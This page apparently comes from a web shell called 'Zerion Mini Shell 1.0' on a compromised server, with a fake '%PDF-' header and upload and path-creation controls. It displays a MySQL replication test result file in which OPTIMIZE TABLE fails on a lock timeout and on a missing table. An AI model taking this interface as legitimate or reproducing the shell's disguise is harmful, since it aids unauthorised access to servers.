%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/rs/mysql/5.1/mysql-test/suite/rpl/r/
Upload File :
Create Path :
Current File : //home/rs/mysql/5.1/mysql-test/suite/rpl/r/rpl_failed_optimize.result

include/master-slave.inc
[connection master]
CREATE TABLE t1 ( a int ) ENGINE=InnoDB;
BEGIN;
INSERT INTO t1 VALUES (1);
OPTIMIZE TABLE t1;
Table	Op	Msg_type	Msg_text
test.t1	optimize	note	Table does not support optimize, doing recreate + analyze instead
test.t1	optimize	error	Lock wait timeout exceeded; try restarting transaction
test.t1	optimize	status	Operation failed
Warnings:
Error	1205	Lock wait timeout exceeded; try restarting transaction
OPTIMIZE TABLE non_existing;
Table	Op	Msg_type	Msg_text
test.non_existing	optimize	Error	Table 'test.non_existing' doesn't exist
test.non_existing	optimize	status	Operation failed
select * from t1;
a
1
commit;
drop table t1;
include/rpl_end.inc

Zerion Mini Shell 1.0